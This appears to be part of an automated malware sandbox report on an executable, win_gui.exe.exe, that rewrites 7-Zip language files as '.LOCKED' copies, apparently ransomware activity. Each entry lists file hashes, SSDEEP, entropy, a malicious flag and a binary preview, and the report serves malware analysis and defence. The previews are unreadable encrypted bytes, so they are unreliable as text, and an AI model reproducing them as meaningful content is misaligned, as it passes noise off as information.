                                SHA-256:3F3DF4A28D25F2AEC7D5AC56FF2F7352F7A096AE2CF6A5DA719479032494DDA1
                                SHA-512:E85C3871943508F98F13C66DFBE3E773524758EA04D0444953B01E6F5D13989C48A5D1E2618F906FBC35A3C068889635A6E150D128DF3DBCE0531DBD09664132
                                Malicious:false
                                Preview:.Y#.@.O.....I.Z...@!.F..@..T ..Q...1..D......}..!....1...!...sa...7.......m1].|...'.......F.$....Y.I....XP.S.0......^wO[%J....7.$..;H.[..cS...s.O...:.......4:....U.K....\;..@.......q.t.bd..&..u.....+.s....G..E.....+.q....`..........d...iu...D..e....$9.f.v..{z.v-@...n..4'C.u..L..I.*....vdo. .........~......:.O..o._0..q..,...A*...p...j....us?.;._.(.*.....5hW..u...K..".[....k..NFk........d..h9..e0sK+.7/.......]...ZUj.\.jUH...2...sn..g.#.e.PAq...9.s.$G..=..K:...m..Eo..E(.e..{T8J.........{.7}.P..........e@N.JG....ta......C.."g..9# DcX.<....Q...+.-p....c.....5.T.c2.0..-=.~..`...Qw.\b...[..fc...S{....s..L.O.0...g....i..M.<.I....s...N...e...Y....)vM...a.h25....U4..........A@..[/.t....k...h..p.~...Bv:S.Up2.lB..|O.......4..{..:F.ilG.I............7....w....*.R....t.$...i.....D...e..^..a...\S..\.c....9D.%...p.(.W.......t[..@........6....ZG.s............;...-`|.zU....YqB..5.^L.}Ij(...-%..%B..W.....-.... ..(.{..&.`F.+.f...~..R.6.....s..&.]

                                C:\Program Files\7-Zip\Lang\hi.txt

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):18479
                                Entropy (8bit):7.990377688213762
                                Encrypted:true
                                SSDEEP:384:WDVet87RUxsI5bMjnEB1pxQG+GscltMNbJXsmW8+VO8:Elk6Oy4QbJE8w
                                MD5:AC508C878336865B5224E1B2FAE37938
                                SHA1:21933C699032BA6DD3EF11F458FBEE9FB82A1116
                                SHA-256:5640247D3485C5A905EE2490285727EAF4CEA43FDBC4D94EE1F8710BAD889499
                                SHA-512:24D3BA17DB469292830D3088634E298A492368AF89FA95A9A9A46688B47B0266DD0EA04733169C6CD75BB299DA9FD8ED6B71D91A8B88593D41138D8F0A0DD2C9
                                Malicious:true
                                Preview:pCAx..zz.q.l.R..s...."h.8!..L.=*~D..qf*Y}..O..N....B.....9$..D....<..yp.!...6 I.`FY(..V...Mj.]w....&..lP....z.~..723:...P....g>:9..l.H.O..6bB....7..<L..M(...@V..........%..B\wU$YL.^..Lj E..k.nGV..F. ..$.x.....3@....JGeX.i.I..r.~U!...A!E....{...B:.6..$...\.......$.P..c.'.......p.a...q.|..n\..&.(J..\._L#.1....5..0s.:o$.y.p*.>. .{:....&bK.w..cK35.MIS[..*q.[.j9(........D...G3.]J......2.W.-.....3.V.E.....j..........`.....*.:.....dlcs...NpG5...R..y{...4.....6.&..s`...;9....7.Sx..D.8.0..C!...........W.h....\.J..../}T..UK....9...=U.^.......dQr.....nh.a{<....{.&.@.J.VA.".k..B,..FDS..hW; F,...l............ .o.%Y.......b...>........Uq=...<.{.x..N.d..u..!..t.u0...)..K..|.~..@y_..d..;..%3f......,....c.-;.r"..C.X&.H6.............<.5 .....y.myz...v...[....1.0...#..u.8E.l.H.......P.m.7.~c...(.C..&.......(...nj=R.q....9o..K.^,R.g.{n..A,U..A.Z....<+D..%Q./.a..........gO....h....|L]..D.K...`|G..>.t...*..B.j.J).-7&..9/9.U!.E..1..[......;.X3f..24.....u.z.^|..;.K.......l.

                                C:\Program Files\7-Zip\Lang\hi.txt.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):18479
                                Entropy (8bit):7.990377688213762
                                Encrypted:true
                                SSDEEP:384:WDVet87RUxsI5bMjnEB1pxQG+GscltMNbJXsmW8+VO8:Elk6Oy4QbJE8w
                                MD5:AC508C878336865B5224E1B2FAE37938
                                SHA1:21933C699032BA6DD3EF11F458FBEE9FB82A1116
                                SHA-256:5640247D3485C5A905EE2490285727EAF4CEA43FDBC4D94EE1F8710BAD889499
                                SHA-512:24D3BA17DB469292830D3088634E298A492368AF89FA95A9A9A46688B47B0266DD0EA04733169C6CD75BB299DA9FD8ED6B71D91A8B88593D41138D8F0A0DD2C9
                                Malicious:true
                                Preview:pCAx..zz.q.l.R..s...."h.8!..L.=*~D..qf*Y}..O..N....B.....9$..D....<..yp.!...6 I.`FY(..V...Mj.]w....&..lP....z.~..723:...P....g>:9..l.H.O..6bB....7..<L..M(...@V..........%..B\wU$YL.^..Lj E..k.nGV..F. ..$.x.....3@....JGeX.i.I..r.~U!...A!E....{...B:.6..$...\.......$.P..c.'.......p.a...q.|..n\..&.(J..\._L#.1....5..0s.:o$.y.p*.>. .{:....&bK.w..cK35.MIS[..*q.[.j9(........D...G3.]J......2.W.-.....3.V.E.....j..........`.....*.:.....dlcs...NpG5...R..y{...4.....6.&..s`...;9....7.Sx..D.8.0..C!...........W.h....\.J..../}T..UK....9...=U.^.......dQr.....nh.a{<....{.&.@.J.VA.".k..B,..FDS..hW; F,...l............ .o.%Y.......b...>........Uq=...<.{.x..N.d..u..!..t.u0...)..K..|.~..@y_..d..;..%3f......,....c.-;.r"..C.X&.H6.............<.5 .....y.myz...v...[....1.0...#..u.8E.l.H.......P.m.7.~c...(.C..&.......(...nj=R.q....9o..K.^,R.g.{n..A,U..A.Z....<+D..%Q./.a..........gO....h....|L]..D.K...`|G..>.t...*..B.j.J).-7&..9/9.U!.E..1..[......;.X3f..24.....u.z.^|..;.K.......l.

                                C:\Program Files\7-Zip\Lang\hr.txt

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):9225
                                Entropy (8bit):7.980955527480138
                                Encrypted:false
                                SSDEEP:192:3DCP55alR3A9+Hpo3BVgnGTCkvXB/G64OjyXcGlR3R+r3+VOZ:TCB543A4HG3Lkd0XB/aOusGlTK3+VOZ
                                MD5:81A32465134E5CD6DB528C77C79CE9B1
                                SHA1:23279F2121C57F28CA313370257C40602DB637F2
                                SHA-256:60496297AF461103B5BE1CED0719C7E2F9FB9772961C28FC7635FA9E623CDBAE
                                SHA-512:63525081599E1C7BC2B8D82A204A128628E5B0BE961E1359DB74B5AC11CBFC9D035F9EE5D1CB0D97FF14DF4C1832559AA72B6C933CA2D706D6206FEF86C15F4D
                                Malicious:false
                                Preview:......T.S.2B.....==B.z..w.0.....q..,.9.....U..R...a....f.x..S..Uo...a.0..1.5d...~..x...e..".]..;.$.........K.sC..l..^........1Z......d.....F....J.Z.M[...K..eV.K..4..mM.5|."F".O..M..>...>...^d-..u?...H...A <j..).@....me..r.r.D.JG%.S.|.r.w...s.B9..8...=...9X-..G#;....Q4\...?..-...Kc.Fda-Z..-.;x.z.4..2.v$)^.r..2e....nh|.~...1.v..%.....AE.E.JY.+.m..............,.<...N......K..?..Z...u.<.\.ue..0_N...%..me."...h.....K&.K>.e+..X.-.....+\3..Y.V...h..;...|.kA.w....Y.m...Svw^...{.._K/..s..7..0....27......;...?t.W0u...H....)c.$...n.M..:..+.....5.,#..q....;........s{T..v.1.g..C5......,.h.Zg..S}.=..(...v.C....8.9..*.U...!.....q...P!..t.%.A9...H_.tB.b.9...b."ne......lR...P.G.p..^B....?.y.p...........M...p......oujN..<..m.X.P.z..;..B=......<v........7.m.C..I..R..:..36.....I..H....t....{S.Kc..c..W..QQ\..g....<..[...at.K.g....}h....Mz}.jN..l]S..T..s8.6...?.{.p.D.XNG.&...R.""DQ....:.p.(0..3].....NC.I?U..-.R.4........"...'..8Z.........3.D^q.q..~jj.

                                C:\Program Files\7-Zip\Lang\hr.txt.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):9225
                                Entropy (8bit):7.980955527480138
                                Encrypted:false
                                SSDEEP:192:3DCP55alR3A9+Hpo3BVgnGTCkvXB/G64OjyXcGlR3R+r3+VOZ:TCB543A4HG3Lkd0XB/aOusGlTK3+VOZ
                                MD5:81A32465134E5CD6DB528C77C79CE9B1
                                SHA1:23279F2121C57F28CA313370257C40602DB637F2
                                SHA-256:60496297AF461103B5BE1CED0719C7E2F9FB9772961C28FC7635FA9E623CDBAE
                                SHA-512:63525081599E1C7BC2B8D82A204A128628E5B0BE961E1359DB74B5AC11CBFC9D035F9EE5D1CB0D97FF14DF4C1832559AA72B6C933CA2D706D6206FEF86C15F4D
                                Malicious:false
                                Preview:......T.S.2B.....==B.z..w.0.....q..,.9.....U..R...a....f.x..S..Uo...a.0..1.5d...~..x...e..".]..;.$.........K.sC..l..^........1Z......d.....F....J.Z.M[...K..eV.K..4..mM.5|."F".O..M..>...>...^d-..u?...H...A <j..).@....me..r.r.D.JG%.S.|.r.w...s.B9..8...=...9X-..G#;....Q4\...?..-...Kc.Fda-Z..-.;x.z.4..2.v$)^.r..2e....nh|.~...1.v..%.....AE.E.JY.+.m..............,.<...N......K..?..Z...u.<.\.ue..0_N...%..me."...h.....K&.K>.e+..X.-.....+\3..Y.V...h..;...|.kA.w....Y.m...Svw^...{.._K/..s..7..0....27......;...?t.W0u...H....)c.$...n.M..:..+.....5.,#..q....;........s{T..v.1.g..C5......,.h.Zg..S}.=..(...v.C....8.9..*.U...!.....q...P!..t.%.A9...H_.tB.b.9...b."ne......lR...P.G.p..^B....?.y.p...........M...p......oujN..<..m.X.P.z..;..B=......<v........7.m.C..I..R..:..36.....I..H....t....{S.Kc..c..W..QQ\..g....<..[...at.K.g....}h....Mz}.jN..l]S..T..s8.6...?.{.p.D.XNG.&...R.""DQ....:.p.(0..3].....NC.I?U..-.R.4........"...'..8Z.........3.D^q.q..~jj.

                                C:\Program Files\7-Zip\Lang\hu.txt

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):10785
                                Entropy (8bit):7.98298473647276
                                Encrypted:false
                                SSDEEP:192:XRc+Y4TGSNjvSm5THdu+ajX6pzXfft7dMsj0Bt6uOPqAPcGbN9vn+VOh:XRprTD7SmFHdaORt7dzjfxZ9vn+VOh
                                MD5:5301B9990DAA62C2217397E225B3B43F
                                SHA1:A250C986FE33644633AE4216D6EB95ED88C0CE04
                                SHA-256:D0532BF983037FBDAB6E43DBA83D41E6E8B7C99F9D12959473D8F166B192384D
                                SHA-512:D7CC3FDA18683B9695E7437103118AFAFBE473A9E77237FC0A45BEF460923B81AE116C948ADDC4B187C1C8E7925BEDA98A47CA1A2E7A64A04D9BCE720AAB2710
                                Malicious:false
                                Preview:.D.:.}..o.B..7HR......2..H>w./..c..4}...+.F..m.J.`..Lc.F.0.#)...JL..tDA..l}.L......H\.C.R?+.......Gf...<5......i..{..T1.bo.9.#o..J..TC..H..FQ..-"..drf.|.:>..;.c.Ef.H.8sYG..&.....j..c'.....qrD.\.`.i.f2.)4}.f..B..<.........S../...7<M.q7..f.....D.......o...o`...[^..l........4&.9..v.C.8......7..&.-.t.. 3........(7.}w.....j.A.Xu.......H.1..4.=.5..,.!.P.=.eI..I.u..:....+...13k.....oGx.w..\.7..3....AX........'Rj...a.m3a/.B.....................f=.0B`_....X...F...7..:.TKN...3.~...@.X'm..<.>...B.......B./-kR."gcd.$!-.cw.#..fX.....'.....H..q$.r7.+.s.._....l..7..6.w\........a'+.g......i.l..|..~................&<.;v...4.9.T[.!..>...q.\Z..?..$s.l.|.....f....D...P..@...^R........)>..6..=...M,.....v....k_;.{k3.O..o~.S..+UG2..1........uU...../?.]..|..!.3..'9.w7..)A"q...i.$...t..?....fH.Bia.oV.j.,..........:.L]....O..}*u.w.......gC%{U.z....,..{.`.f..>c...o..B...T.\.....W..b7q...m..b.!#.j..1...2.O.{.xW...L./.|.y...B.`......-...?...t.+..._+..^.3t?.

                                C:\Program Files\7-Zip\Lang\hu.txt.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):10785
                                Entropy (8bit):7.98298473647276
                                Encrypted:false
                                SSDEEP:192:XRc+Y4TGSNjvSm5THdu+ajX6pzXfft7dMsj0Bt6uOPqAPcGbN9vn+VOh:XRprTD7SmFHdaORt7dzjfxZ9vn+VOh
                                MD5:5301B9990DAA62C2217397E225B3B43F
                                SHA1:A250C986FE33644633AE4216D6EB95ED88C0CE04
                                SHA-256:D0532BF983037FBDAB6E43DBA83D41E6E8B7C99F9D12959473D8F166B192384D
                                SHA-512:D7CC3FDA18683B9695E7437103118AFAFBE473A9E77237FC0A45BEF460923B81AE116C948ADDC4B187C1C8E7925BEDA98A47CA1A2E7A64A04D9BCE720AAB2710
                                Malicious:false
                                Preview:.D.:.}..o.B..7HR......2..H>w./..c..4}...+.F..m.J.`..Lc.F.0.#)...JL..tDA..l}.L......H\.C.R?+.......Gf...<5......i..{..T1.bo.9.#o..J..TC..H..FQ..-"..drf.|.:>..;.c.Ef.H.8sYG..&.....j..c'.....qrD.\.`.i.f2.)4}.f..B..<.........S../...7<M.q7..f.....D.......o...o`...[^..l........4&.9..v.C.8......7..&.-.t.. 3........(7.}w.....j.A.Xu.......H.1..4.=.5..,.!.P.=.eI..I.u..:....+...13k.....oGx.w..\.7..3....AX........'Rj...a.m3a/.B.....................f=.0B`_....X...F...7..:.TKN...3.~...@.X'm..<.>...B.......B./-kR."gcd.$!-.cw.#..fX.....'.....H..q$.r7.+.s.._....l..7..6.w\........a'+.g......i.l..|..~................&<.;v...4.9.T[.!..>...q.\Z..?..$s.l.|.....f....D...P..@...^R........)>..6..=...M,.....v....k_;.{k3.O..o~.S..+UG2..1........uU...../?.]..|..!.3..'9.w7..)A"q...i.$...t..?....fH.Bia.oV.j.,..........:.L]....O..}*u.w.......gC%{U.z....,..{.`.f..>c...o..B...T.\.....W..b7q...m..b.!#.j..1...2.O.{.xW...L./.|.y...B.`......-...?...t.+..._+..^.3t?.

                                C:\Program Files\7-Zip\Lang\hy.txt

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):14745
                                Entropy (8bit):7.9883261798609695
                                Encrypted:false
                                SSDEEP:384:VIopoTpVQVdPljFBnjSTDwCLHDs6znH/YAW+VOz:VIop4pV+PFoJsyH/gX
                                MD5:8E8D2780A242983BA058BEB27552B744
                                SHA1:B0BC04ACBE5FD060C6A7306DCCBA6442777ABAB4
                                SHA-256:055868CA39DF3B57FA34AAA102B896366D15CAE8FE4B4C4796C3F5FCB35BE6E4
                                SHA-512:E2C3356EC2B4A906C3CE68C965347BDD0407E71556879001F35E5FFB92C3F4802C86E3C41C5BABA84C9F44560978989807560B6DC5494FCFE96B76E84FDB5AEF
                                Malicious:false
                                Preview:....F.......X..h.x...~.l...8.G.+..PS..tF}..q...!.eM.TyR.5.fzI.4.\L.s.n...g.;VW.ca.>b..~.)..6i;n..d_.I.z...w.[.!U..x..v..V.aK....!....e.4|...#....=.n....g.UB....b.K.... S.U.8...Jn.et>u...9].%~N.Y.).,9..U.....J..l.p. ..pZn...@.0.Xf..^6..'..Y..P......-Z..m.8b.q5L.s.u{WE..:.b.wX.U9$....."/...1...97,.E..p]e(.....'H.....|*.....2K..U.Jy,..MD.m.&Y.XQ.~..q&.`..G.MB.y....l......C.....q.G_....ur #.0.F.6.+@.s.....SV.;...j.....X,'X...#i.A:.;...:..33.h[...=k..wB......_...Tx."..... .!.>......p..+....|Z/{l..i.{b..........u.!M.....4...AA....3.8.7..Np.W[k$ .5.:h....j:?...U....\m!j^p.]j...X...I..L.s..P..q..=..S,..|... :.P..|.U..#..L^0>..`.,.MvKv..eD..V...F.I.6...R...E......./.+?GjX.R...j.q.s.?.`I..R\.X...3.B..4...d.'.ob ..VW......-9p.............7{.!F..k..U.q4.4AZ..".y.....-.#.E......o+.....j..7L.............{.Y.`|..l;.[>0:u.n..J.N.....,..l.|..Wu..vk01..u\Mz.0.T^.....@vW..1~....M..qI..&.&....^.&t.-...GS.wu.dZ._.*..........(<..7.].~3.....\....m..L.K..X

                                C:\Program Files\7-Zip\Lang\hy.txt.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):14745
                                Entropy (8bit):7.9883261798609695
                                Encrypted:false
                                SSDEEP:384:VIopoTpVQVdPljFBnjSTDwCLHDs6znH/YAW+VOz:VIop4pV+PFoJsyH/gX
                                MD5:8E8D2780A242983BA058BEB27552B744
                                SHA1:B0BC04ACBE5FD060C6A7306DCCBA6442777ABAB4
                                SHA-256:055868CA39DF3B57FA34AAA102B896366D15CAE8FE4B4C4796C3F5FCB35BE6E4
                                SHA-512:E2C3356EC2B4A906C3CE68C965347BDD0407E71556879001F35E5FFB92C3F4802C86E3C41C5BABA84C9F44560978989807560B6DC5494FCFE96B76E84FDB5AEF
                                Malicious:false
                                Preview:....F.......X..h.x...~.l...8.G.+..PS..tF}..q...!.eM.TyR.5.fzI.4.\L.s.n...g.;VW.ca.>b..~.)..6i;n..d_.I.z...w.[.!U..x..v..V.aK....!....e.4|...#....=.n....g.UB....b.K.... S.U.8...Jn.et>u...9].%~N.Y.).,9..U.....J..l.p. ..pZn...@.0.Xf..^6..'..Y..P......-Z..m.8b.q5L.s.u{WE..:.b.wX.U9$....."/...1...97,.E..p]e(.....'H.....|*.....2K..U.Jy,..MD.m.&Y.XQ.~..q&.`..G.MB.y....l......C.....q.G_....ur #.0.F.6.+@.s.....SV.;...j.....X,'X...#i.A:.;...:..33.h[...=k..wB......_...Tx."..... .!.>......p..+....|Z/{l..i.{b..........u.!M.....4...AA....3.8.7..Np.W[k$ .5.:h....j:?...U....\m!j^p.]j...X...I..L.s..P..q..=..S,..|... :.P..|.U..#..L^0>..`.,.MvKv..eD..V...F.I.6...R...E......./.+?GjX.R...j.q.s.?.`I..R\.X...3.B..4...d.'.ob ..VW......-9p.............7{.!F..k..U.q4.4AZ..".y.....-.#.E......o+.....j..7L.............{.Y.`|..l;.[>0:u.n..J.N.....,..l.|..Wu..vk01..u\Mz.0.T^.....@vW..1~....M..qI..&.&....^.&t.-...GS.wu.dZ._.*..........(<..7.].~3.....\....m..L.K..X

                                C:\Program Files\7-Zip\Lang\id.txt

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):9270
                                Entropy (8bit):7.980469599585448
                                Encrypted:false
                                SSDEEP:192:DWHqwyuWM0Sxr9BYE7Kmm1KpY1AjiKtDe8p2V4RO5lE+VO4:D6RBWMhxxBZm1h101VeAi5lE+VO4
                                MD5:ADD776800F8BBA4A276486D4F15D6CCB
                                SHA1:504D7CB286339316DA57D99FF6C5FF510FBB014C
                                SHA-256:3611FBB01C27B194CC7515412BCAEAFE6596DA35985AA321B890D75D3A4B02E5
                                SHA-512:5C37D09077A74989574758D02D93A92B4819DEF3F996126998B096738E5F8CF2B179472C593C170EE822E40F7AD619CD67E4E8B4B2EFBA280453D711D07D44F0
                                Malicious:false
                                Preview:.._.Y.&'.M..7...$".\....(.7..Lo.^b.1p....._ ...$,...!T.;r.....)..g&..IF.&..y...w.........FCx.......[V.>.^.....;,).Z.Dc...f)..\T.BT.yh.p..4f./...W.......v_...."..B..+...60.4.A.X5.g9.b>..e...<~.....P..hP.@jEJ...P..S.e......BL=u.]..$.r.J..$:i&..8.OC.S.".4mN.<m.....L....=.....5g+..i..N.......:.8/JT.?..z....h.X.....[oJ..H..&.....H_...AF."..@...Z......*...E7.{.Ac.9.6.,.k....,s..c..^3.a.?.$%....,V.Yz.".(B.o..'.:.]...x.....:/...A...(ha........c...(.I........K/C.@....f.."..Tj...j_.7....NN...kY..IAoT.G6..9.I;..iZ...n+..l.'.Y7.Z....B'.^`..g.lw.....".~....'..=....iGFg..ia...d..|..`S...z-....4.#.q;>. [.h....&Y.......sr........!.a4....J%..C........K....Y.`...F..9.N...9.E.9...$.J.....M....W....w...........v..N.....i.!..!...........D.0k..0.P..p..M.J.....1..2~u.^&......\.R.#..k...L`.OB^.1.P.a.m:Y......r...>&.Z*.....*`.GWo.....P.UxP..>.W.cA......9.D.iY\`.a8...'<.PWr..s..-..+}..b...6h..D.......2..a.['..m4..K.a...>.{........./..l6.....ZS6.X.S..C.}....A...

                                C:\Program Files\7-Zip\Lang\id.txt.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):9270
                                Entropy (8bit):7.980469599585448
                                Encrypted:false
                                SSDEEP:192:DWHqwyuWM0Sxr9BYE7Kmm1KpY1AjiKtDe8p2V4RO5lE+VO4:D6RBWMhxxBZm1h101VeAi5lE+VO4
                                MD5:ADD776800F8BBA4A276486D4F15D6CCB
                                SHA1:504D7CB286339316DA57D99FF6C5FF510FBB014C
                                SHA-256:3611FBB01C27B194CC7515412BCAEAFE6596DA35985AA321B890D75D3A4B02E5
                                SHA-512:5C37D09077A74989574758D02D93A92B4819DEF3F996126998B096738E5F8CF2B179472C593C170EE822E40F7AD619CD67E4E8B4B2EFBA280453D711D07D44F0
                                Malicious:false
                                Preview:.._.Y.&'.M..7...$".\....(.7..Lo.^b.1p....._ ...$,...!T.;r.....)..g&..IF.&..y...w.........FCx.......[V.>.^.....;,).Z.Dc...f)..\T.BT.yh.p..4f./...W.......v_...."..B..+...60.4.A.X5.g9.b>..e...<~.....P..hP.@jEJ...P..S.e......BL=u.]..$.r.J..$:i&..8.OC.S.".4mN.<m.....L....=.....5g+..i..N.......:.8/JT.?..z....h.X.....[oJ..H..&.....H_...AF."..@...Z......*...E7.{.Ac.9.6.,.k....,s..c..^3.a.?.$%....,V.Yz.".(B.o..'.:.]...x.....:/...A...(ha........c...(.I........K/C.@....f.."..Tj...j_.7....NN...kY..IAoT.G6..9.I;..iZ...n+..l.'.Y7.Z....B'.^`..g.lw.....".~....'..=....iGFg..ia...d..|..`S...z-....4.#.q;>. [.h....&Y.......sr........!.a4....J%..C........K....Y.`...F..9.N...9.E.9...$.J.....M....W....w...........v..N.....i.!..!...........D.0k..0.P..p..M.J.....1..2~u.^&......\.R.#..k...L`.OB^.1.P.a.m:Y......r...>&.Z*.....*`.GWo.....P.UxP..>.W.cA......9.D.iY\`.a8...'<.PWr..s..-..+}..b...6h..D.......2..a.['..m4..K.a...>.{........./..l6.....ZS6.X.S..C.}....A...

                                C:\Program Files\7-Zip\Lang\io.txt

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):5616
                                Entropy (8bit):7.964072352127057
                                Encrypted:false
                                SSDEEP:96:XtPDZ20X17KzIm7aT1XZoUGd5sORg0+nfrBPN63jHUF/Y4LAHhQUSkSKJZevuAVg:XBF2g2zXuXMG7nFwIF/VmhYg+VOF
                                MD5:0557BEF91C6731435CB3CD6EAAA8C109
                                SHA1:93CCA1F78A778C3AAD7503DB70F85165C59797A0
                                SHA-256:A5748FB737A2399B0A16C76E8AA7377686856305237C755F3456804A837BEB3D
                                SHA-512:5CBCF3D415EF88AC581EFA5576127027F2132B832E9FEA745977A1E00017F645BC79CBF55D15B121D42370EB8C0FE95ECEE7C4BE767F987F3DA2BE8005F10E1C
                                Malicious:false
                                Preview:[n...V.W...T....[M.....A|\M..L_...7s..3.0..V...a<\?\T.gR.S..o7.{...!.m)...6`.0.0....n.o..#...`d..|..E(.6iQq.j.wK.<..@G....-...X.."*.%h..</p......7.gq?~.:^.r*+..Wo..n.6"`{.Ca1..x.....ZZ5?`.... ..J...r~..[..I.XP0.!F..H?.......;p....(..K.Z..%......tX.lKH...C.C......Mf@..y[.oG....r.JCJ._C>...y.~...w.K........9..Uo3.>....y.....XC..F.qT3.....yJ.<..I|.>.sd.`.z.D~r.../.,...0.$BV...w.Ep....d.......I{...."jV.ZW..........M8..q...m..x%.qI..@....=.......r[..tl...2/Y.{.....l.....=X6}@...@..N.2 .(b...[.o...W..F.4.. . ...s....5.S.......+.7.......&:.i.&.F.)0..U........~...?,.6.x.6.J.0..L...V..E..]p.H.. ....w....~.fUg...^[.....5..".......%G..D...y..0......?.6.1....RP..`....L..hR.N..P.81.t..=X.....7|.i.>.h.p(...Q*..0.}.G@=....n.Q,x!..5.. .*8.@.....zL.........$.....Z..d.D.$.dx@0v[.Ct.w.C...A.&.v.v..].cz.^"c...i......1.LV..m...<...Uu...:....'.........^..J.BHG_5.,./d.t.+]c^.....)ts.Gr...Mh........I....g....D.~lfD...G.z.P.;3.bj1.H...s..\...V..L.<9U..y.lv-}\k.....X

                                C:\Program Files\7-Zip\Lang\io.txt.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):5616
                                Entropy (8bit):7.964072352127057
                                Encrypted:false
                                SSDEEP:96:XtPDZ20X17KzIm7aT1XZoUGd5sORg0+nfrBPN63jHUF/Y4LAHhQUSkSKJZevuAVg:XBF2g2zXuXMG7nFwIF/VmhYg+VOF
                                MD5:0557BEF91C6731435CB3CD6EAAA8C109
                                SHA1:93CCA1F78A778C3AAD7503DB70F85165C59797A0
                                SHA-256:A5748FB737A2399B0A16C76E8AA7377686856305237C755F3456804A837BEB3D
                                SHA-512:5CBCF3D415EF88AC581EFA5576127027F2132B832E9FEA745977A1E00017F645BC79CBF55D15B121D42370EB8C0FE95ECEE7C4BE767F987F3DA2BE8005F10E1C
                                Malicious:false
                                Preview:[n...V.W...T....[M.....A|\M..L_...7s..3.0..V...a<\?\T.gR.S..o7.{...!.m)...6`.0.0....n.o..#...`d..|..E(.6iQq.j.wK.<..@G....-...X.."*.%h..</p......7.gq?~.:^.r*+..Wo..n.6"`{.Ca1..x.....ZZ5?`.... ..J...r~..[..I.XP0.!F..H?.......;p....(..K.Z..%......tX.lKH...C.C......Mf@..y[.oG....r.JCJ._C>...y.~...w.K........9..Uo3.>....y.....XC..F.qT3.....yJ.<..I|.>.sd.`.z.D~r.../.,...0.$BV...w.Ep....d.......I{...."jV.ZW..........M8..q...m..x%.qI..@....=.......r[..tl...2/Y.{.....l.....=X6}@...@..N.2 .(b...[.o...W..F.4.. . ...s....5.S.......+.7.......&:.i.&.F.)0..U........~...?,.6.x.6.J.0..L...V..E..]p.H.. ....w....~.fUg...^[.....5..".......%G..D...y..0......?.6.1....RP..`....L..hR.N..P.81.t..=X.....7|.i.>.h.p(...Q*..0.}.G@=....n.Q,x!..5.. .*8.@.....zL.........$.....Z..d.D.$.dx@0v[.Ct.w.C...A.&.v.v..].cz.^"c...i......1.LV..m...<...Uu...:....'.........^..J.BHG_5.,./d.t.+]c^.....)ts.Gr...Mh........I....g....D.~lfD...G.z.P.;3.bj1.H...s..\...V..L.<9U..y.lv-}\k.....X

                                C:\Program Files\7-Zip\Lang\is.txt

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):9354
                                Entropy (8bit):7.97977695978727
                                Encrypted:false
                                SSDEEP:192:MZ1up68yxW6CQdqpM0NbNKpzApSv4TJv9E5dqeWGagYAXNfxl/2Mp+VOU:MZc68ys6CQdeLNbwzA8cKXqLyY+fxl+D
                                MD5:013D6B68365103BB45ED7388CA3F0E4D
                                SHA1:FABAAA92AD3B5661DC1090912300089E9FAE1990
                                SHA-256:1771FDDC4F368570E1CE42FE795EF44C9F15FF29F8CF9A64332685FCC3F6C6A3
                                SHA-512:068526E17B2AAE4EBB478514F7B6976E953C026C654508A338D184E91699E898D4FC532A97707DA7006DC609F25577BAC251C3DD99CDCE8BEB3293AA39C4208F
                                Malicious:false
                                Preview:..%:9..U....D..j.......... ...Br6.v..W8.....%..nB(...fX.. >.j<..A..T.Q....4.o}..`..CG..u..=...>6.......f.Y..D.e...Nn.K.4........[...u.!...a!.5._.H.x..Y.1...DW...y....c......u..0..}...........6.3c...)E...+j.Z...!..AV.. .m..9.'.....P..._.....!..T.LL...Zt.N.....b..iT.@..W.,.Xn..O.....S0zZ.H..s..7I..O.Q?..f....}.w\..B[....p..Ai....$.m.'6. ...).q.....u.,......1..|.+bn+u!Hob..?...@<...."".+.....%..O..a..8...R2$.j..+..Zn.t.OL_..K..u.2.A....p..U."..E...7...).AN. .S..=".S..):.+..P.f.......6.#.%.....5...9.....@0?..,%p..C....W....Uu.n..@.9.i..I..prK../.....E...:.Y..z.w.. .....Xk..u..:x.U.[..+....#Ok,.d.....kl.o.0.n|%......+......l%..[...j..n.G?....|....g....a...J.x..L.....!..............;....'F.c.cc.u..e..Yb.....;....;IK.U.......P..}.....@...A. .x..x.....c.1.3...*g.K...=.w..q}.rgw..Lxj'!....c.=.$.n...........}..n:..R....GN...i>.v.4.......N......e.)...li.G.1...&t..|.Xz>.5...d...B..8.`...K.."Q..{i~)..n0.).JKu...l.AI..M}...byC.},.c.xZe...l.,.....B.u.

                                C:\Program Files\7-Zip\Lang\is.txt.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):9354
                                Entropy (8bit):7.97977695978727
                                Encrypted:false
